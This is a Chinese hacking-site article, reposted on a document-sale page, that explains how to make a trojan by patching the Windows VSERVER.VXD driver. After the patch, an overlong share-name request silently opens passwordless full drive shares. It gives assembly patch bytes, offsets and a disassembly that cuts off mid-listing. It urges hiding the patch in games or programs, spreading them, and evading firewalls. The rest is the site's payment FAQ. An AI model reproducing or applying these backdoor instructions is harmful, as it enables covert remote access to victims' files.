制作木马的简易方法

首页安全技术黑客技术软件下载在线攻击闲聊论坛休闲天地关于本站|黑客类文章||安全类文章||黑客类文章>>黑客技术>>制作木马的简易方法制作木马的简易方法ehacking.myetang网络安全和黑客技术网上木马程序很流行,其实说来也很简单,大致都是修改注册表或者INI文件加载一个文件提供服务,这就手工都很容易检测出木马来。一,看增加的不明服务。二,因为木马是作为服务一般要打开一个网络通信端口,所以检查增加的服务端口也很容易检查出木马程序来。其实完全可以稍微改动操作系统内核而作出一个很好的木马来,这样不用改动注册表也可以让用户很不容易发觉。下面就是简单改动一个驱动程序做一个木马的方法。大家可以分析别的驱动程序相应的作出自己的木马来。这儿是利用WINDOWS的共享和远程管理。WINDOWS的共享如果共享名是ADMIN$就可以远程管理,就是登陆ADMIN$进去了后所有的盘都完全共享为盘符加$.下面一段就是VSERVER。VXD处理共享的一段程序,SUB_0027校验密码,密码对了后后面检测共享名是ADMIN$否,是就看C$,D$...共享没有(DATA_0431==0?),没共享就调用SUB_0230共享,SUB_0230一个参数就是密码指针,如果密码指针为0就没密码。这儿为了好改动就用的这个参数。显然我们就可以必要的时候调用SUB_0230就开了个后门。LOC_0415是检测网络通信的共享名串大于0DH否(包括串后的0),是就转LOC_0419出错返回,显然我们可以利用这儿去调用SUB_0230.看LOC_0419有7个字节可以利用,可以安排CALLSUB_0230NEW_LOC_0418POPeaxjmp03469刚好7个字节。3436:JELOC_0418是没找到要共享的目录跳转到LOC_0418显然要改动,改动成JENEW_LOC_0418就可以。现在是LOC_0415一段要跳转到LOC_0419前要PUSH0以调用SUB_0230。下面是LOC_0415的改法:LOC_0415:03415XOREAX,EAX;2字节,同样SUBAL,AL得到AL=0;还得到EAX=0。03417PUSHEAX;1字节调用SUB_0230用的DWORD参数0;03418XORECX,ECX;2字节ECX=0;0341ADECECX;1字节得到ECX=0FFFFFFFFH这儿与MOVECX,0FFFFH一样但字节数少0341Bmovedi,ebx;2bytes0341Drepnescasb;2bytes0341FSUBEDI,EBX;2bytesgetthesharenamelong03421CMPEDI,0Dh;3bytes大于等于0DH跳转。这儿条件可以改动为等于多少跳转等。03424jashortloc_0419;2byte03426POPEAX;1byte堆栈平衡03427PUSHEDI;1byte03428POPEAX;1byteEAX=EDISHARENAMELONG,后面要用刚好字节够用,注意DATA_0182那儿有重定位那种字节不能简单改动。你可以把你的好的程序好的游戏加上一小段代码这么改动他的VSERVER。VXD文件,最好是硬盘的WINDOWS安装目录打包文件里面的VSERVER。VXD也改动,还有访问共享目录\\IP的139端口也最好加一个别的端口以逃避有些路由器防火墙的设置,再把你的程序散发。。。。。中了你的木马的你访问他的共享目录后面加一大串字母(共享名串长大于等于0DH)会提示出错,但你就可以再访问\\IP\C$,\\IP\D$....了,这可是完全共享的了.如果你先没有那个一大串字母的访问他也没有设置远程管理的话\\IP\C$,\\IP\D$...都不能访问的,他自己用网络监视器也看不到这种共享的,所以很不容易觉察的。注意你进入共享目录了网络监视器还是能看到。;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌;SUBROUTINE;;Calledfrom:031FD,32CC;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘033F4sub_0026procnear033F456pushesi033F566|813B5C5Ccmpwordptr[ebx],5C5Ch033FA7407jeshortloc_0412;Jumpifequal033FC66|813B2F2Fcmpwordptr[ebx],2F2Fh034017512jneshortloc_0415;Jumpifnotequal03403loc_0412:;xref033FA034038D7302leaesi,dwordptr[ebx+2];Loadeffectiveaddr03406loc_0413:;xref0340F03406E800006961callsub_0207;(09D6C)0340B7405jzshortloc_0414;Jumpifzero0340D3C5Ccmpal,5Ch;'\'0340F75F5jneloc_0413;Jumpifnotequal0341146incesi03412loc_0414:;xref0340B034128D5EFFleaebx,dwordptr[esi-1];Loadeffectiveaddr03415loc_0415:;xref03401034152AC0subal,al03417B90000FFFFmovecx,0FFFFh0341C8BFBmovedi,ebx0341EF2/AErepnescasb;Repzf...

1、当您付费下载文档后,您只拥有了使用权限,并不意味着购买了版权,文档只能用于自身使用,不得用于其他商业用途(如 [转卖]进行直接盈利或[编辑后售卖]进行间接盈利)。
2、本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供参考,付费前请自行鉴别。
3、如文档内容存在侵犯商业秘密、侵犯著作权等,请点击“举报”。

常见问题具体如下:

1、问:已经付过费的文档可以多次下载吗?

      答:可以。登陆您已经付过费的账号,付过费的文档可以免费进行多次下载。

2、问:已经付过费的文档不知下载到什么地方去了?

     答:电脑端-浏览器下载列表里可以找到;手机端-文件管理或下载里可以找到。

            如以上两种方式都没有找到,请提供您的交易单号或截图及接收文档的邮箱等有效信息,发送到客服邮箱,客服经核实后,会将您已经付过费的文档即时发到您邮箱。

注:微信交易号是以“420000”开头的28位数字;

       支付宝交易号是以“2024XXXX”交易日期开头的28位数字。

客服邮箱:

biganzikefu@outlook.com

所有的文档都被视为“模板”,用于写作参考,下载前须认真查看,确认无误后再购买;

文档大部份都是可以预览的,笔杆子文库无法对文档的真实性、完整性、准确性以及专业性等问题提供审核和保证,请慎重购买;

文档的总页数、文档格式和文档大小以系统显示为准(内容中显示的页数不一定正确),网站客服只以系统显示的页数、文件格式、文档大小作为依据;

如果您还有什么不清楚的或需要我们协助,可以联系客服邮箱:

biganzikefu@outlook.com

常见问题具体如下:

1、问:已经付过费的文档可以多次下载吗?

      答:可以。登陆您已经付过费的账号,付过费的文档可以免费进行多次下载。

2、问:已经付过费的文档不知下载到什么地方去了?

     答:电脑端-浏览器下载列表里可以找到;手机端-文件管理或下载里可以找到。

            如以上两种方式都没有找到,请提供您的交易单号或截图及接收文档的邮箱等有效信息,发送到客服邮箱,客服经核实后,会将您已经付过费的文档即时发到您邮箱。

注:微信交易号是以“420000”开头的28位数字;

       支付宝交易号是以“2024XXXX”交易日期开头的28位数字。

笔杆子文秘
机构认证
内容提供者

为您提供优质文档,供您参考!

确认删除?